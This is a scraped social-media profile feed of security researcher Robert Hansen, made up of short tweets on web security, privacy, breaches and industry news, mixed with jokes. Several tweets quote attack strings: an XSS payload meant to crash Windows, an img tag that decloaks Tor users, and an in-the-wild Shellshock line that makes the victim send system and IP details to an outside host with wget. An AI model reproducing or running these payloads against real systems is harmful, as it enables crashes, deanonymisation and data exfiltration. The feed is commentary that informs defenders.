Your security program summarized (probably):
Follow
Robert Hansen
@RSnake
Deputy CTO, vCISO, defender of others' privacy, AI hacker, Advisor, often found joking.
Robert Hansen’s posts
Hacker life be like: gzcat dump.gz |cut -f 1 -d “:” |tr ‘[[:upper:]]’ ‘[[:lower:]]’ |egrep “^[a-z0-9\-]+.*@.+” |sort |uniq > emails.txt
Equifax's surface area for anyone curious: analysis.outsideintel.com/equifax.txt
If you use Express VPN you definitely need to read this:
Me: “I wonder what the right regex for checking emails is.”
The Internet: 😑
It turns out ~90% of credit card POS terminals use one of two passwords,166816 or Z66816.
XSS BSOD <script>var c=new XMLHttpRequest();c.open('GET','/');c.setRequestHeader('Range','bytes=18-18446744073709551615');c.send();</script>
Wait, was this a 16 bit integer overflow the U2 caused when flying at 65,535+ feet?
If you're wondering, “Should I update my iPhone today?” Yes, yes you should:
Wow, Flash is dead and now so too is Java Applets!
Detecting Tor users can be as simple as putting up a Tor hidden service and linking to it: <img src=“//[whatever].onion/?[user-ip-address]”>
Useful default test financial data for pentesters. Don’t forget to disable test data in prod peeps.
“dolphins” is now a safe password, feel free to use it: github.com/danielmiessler
Cool, if you can inject into people’s CSS files you can use it to do keystroke logging without JS or breaking inline JS rules via CSP in the process: github.com/maxchehab/CSS-
Make sure to delete all of the recordings Google has of you (and tell your friends to do the same): history.google.com/history/audio
ImageMagick's ghostlib has a remote code execution exploit. If your site processes images, patch up: ghostbutt.com
I hung out with someone who got the COVID vaccine and I’m sad to report my 5g cell phone reception has not improved at all.
I’m disappointed to hear about Google today. They had a social product and didn’t tell anyone?
If your site collects PII you’ve got one month left before Google will mark it as insecure for not using HTTPS: plus.google.com/+GoogleWebmast
I published a list of HTTP Response headers for reference: blog.whitehatsec.com/list-of-http-r
RIP James Flom (id) and his girlfriend Shannon Norton. James was my best friend.
Me doing my duties on the review board. Reviewing security talks requires hacker gear.
Venezuela’s Bolivars are worth so little they may start causing issues with exchanges who round to the nearest fraction of pennies.
PSA - the command to detach a GNU screen (Control-A Control-D) is the same command in Outlook that selects all your email... and then deletes all of your email. Fun times.
I wonder how many kids will grow up thinking Alexa, Siri and Ok Google pronounce things correctly.
IPv6 is… interesting. Your security/log analysis tool might require an update to normalize the addresses:
A nice JS de-obfuscation tool - Revelo 2.0 released: kahusecurity.com/2015/revelo-up
Apparently Adobe has finally agreed with what security experts have been saying for years: theverge.com/2015/12/1/9827 Java applets next.
I’m happy to announce that OutsideIntel was acquired by Bit Discovery: smartphoneexec.com/outsideintel-a
If you use Firefox, type about:config click through type privacy.trackingprotection.enabled and change the value to “true”
In light of all these DDoS attacks, I wrote a DDoS runbook: blog.whitehatsec.com/checklist-to-p
Another day, another exchange gets hacked and goes under. It almost feels like crypto exchanges are unsafe. Hmm... t.co/rmeSVwLNRF
This Tweet is unavailable.
PSA: If you spam a conference with 15 submissions from your company it takes ~15 seconds to reject all of them.
Whew! What a ride!!
Quote
We have officially acquired @BitDiscovery, a leader in external #attacksurface management (EASM). Paired with our market-leading solutions, customers will have a comprehensive view into known and previously unknown internet-facing assets. tenable.com/press-releases
Secretary Fanning announcing “Hack the Army” Recruitment sites are in scope and open to .mil personnel.
If you use Gmail, I highly recommend changing this email image setting: support.google.com/mail/answer/14
Lexington Insurance Company and Beazley Insurance Company are suing Trustwave over Heartland breach: bleepingcomputer.com/news/security/
Ugh, disable Alexa Drop-In. It tells people when you're home. *shutter* Privacy disaster zone.
Finally got around to donating the XSS cheat sheet to http://t.co/EI1zI9AK Now everyone can edit/modify at will.
First of three parts: "Interview with a Blackhat" blog.whitehatsec.com/interview-with
I’d expect huge layoffs tomorrow (Friday). Be nice to everyone. The chances are a lot of people and their families are going to have a very rough day tomorrow. #COVID19
One week remaining before Google marks http sites insecure if they have forms. Shhh, don’t tell your competitors.
Extremely accurate drone strike with a grenade. Pretty impressive delivery mechanism for tight seemingly impenetrable/austere conditions.
Quote
Ho Ho Ho! #MeryChristmas #WesołychŚwiąt 
Throwing gifts into the chimney of Russian invaders
by Ukrainian defenders. #Ukraine #GloryToUkraine
Throwing gifts into the chimney of Russian invaders
by Ukrainian defenders. #Ukraine #GloryToUkraine
Replying to
Are you *certified* not CISSP? Has someone checked your uncertification requirement to use that title?
Time to make your smart TV’s dumb again and disconnect them. Exploit in HbbTV:
Tor hidden services decloaking technique blog.whitehatsec.com/tor-hidden-ser
It’s generally not a great sign when an agency refuses to say if they have any information about you, I’m guessing.
GDPR privacy changes already being deployed by some registrars. Whois is already being neutered in some cases:
It's always the weakest link, isn't it? Compromised printers can compromise Windows boxes via malicious drivers: blog.vectranetworks.com/blog/microsoft
PSA: Updating your phone and all apps before going to Blackhat/DefCon/BSidesLV is a good idea. Or better yet, don't bring them at all.
Useful little JavaScript tool to decode BigIP cookies: blog.whitehatsec.com/f5-networks-bi
Facebook: Settings->Account settings->Ads->Manage the Preferences We Use To Show You Ads->Visit Ad Preferences->More
Tor SSL downgrade attacks being performed. Moral of the story? Don’t trust the exit node:
Regarding breach disclosure: it occured to me that companies could use the spammiest looking content with the worst keywords from the shadiest RBL IP ranges and send it out as fast as possible so that it gets caught by anti-spam filters.
If you use a Symantec/Thawte/Verisign/Equifax/Geotrust/RapidSSL cert, you'll be needing to replace that: security.googleblog.com/2017/09/chrome
“You don’t want a doctor to have to go through a forgot password flow with a patient on the table.” “I’d hate to see a corpse with it’s privacy intact.” Wrt optimizing for human life over privacy -
Wow - this could get very interesting for the pen testing/assessment industry. Banks sue Trustwave for Target breech: http://t.co/D0moZ59xZg
Is it me or did the Internet miss a golden opportunity to name the log4j vuln “logjam”?
Formaction scriptless attack (HTML5 fun): blog.whitehatsec.com/hackerkast-29-
Don’t forget to block those site/ad trackers, kids. Google Analytics especially.
Quote
Google's tracking has grown since the GDPR came into force while its smaller rivals have been obliterated. cliqz.com/en/magazine/st
News Outlets, “Bad actors are trying to make money off of the coronavirus crisis.”
Also News Outlets, “You can’t see our clickbait until you enable ads.”
If you enter a “0” and your hash starts with “0e...” it will match in PHP: news.ycombinator.com/item?id=9484757
Russia is just DDoSing to help the US with work-life balance and to that we say thank you.
10 proactive security things to think about as you're building your web app: blog.whitehatsec.com/top-10-proacti
For UFO VPN, FAST VPN, Free VPN, Super VPN, Flash VPN, Secure VPN, and Rabbit VPN users out there:
WhiteHat Aviator: a safer, more private and faster browser for OSX: blog.whitehatsec.com/introducing-wh
I think this inadvertently proved using Stripe is risky business.
Quote
Today @stripe blocked our account and hold all the money that we charged via @backerkit for shipping of #FlipperZero. Explaining this by the fact that we have a “risky business”. Pretty weird considering that Stripe already processed all our Kickstarter payments before.
Biometrics aren't much sufficiently different than tattooing your password on yourself somewhere.
A little tool I wrote to help detect if your DNS has been hijacked: blog.whitehatsec.com/dnstest-monito
Replying to
One of the worst parts about this for me isn’t that it happened, or what it implies, but how common this kind of spaghetti coding is becoming. He names almost every modern language and tons of frameworks. Try threat modeling that mess.
Once upon a time a boss of mine asked me if I got an email an executive had sent but I wasn’t certain. So he asked one of my co-workers who was sitting next to me to forward it over. Sure enough I had gotten it but when I was looking at the two emails side by side they seemed…
Shellshock in the wild: () { :; }; /usr/bin/wget -qO - x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl -qO- ifconfig.me`
Wow - only took the browser companies 18 years to figure out intranet port scanning + CSRF was a real problem. ;) twitter.com/campuscodi/sta
This Tweet is unavailable.
Intranet hacking using JS. Yes, it’s still a problem that browsers are vulnerable to and are being exploited with even more than a decade later: hacking.reviews/2018/10/ghostd /cc
Lying to your security staff is like lying to your psychiatrist - you’re only hurting yourself.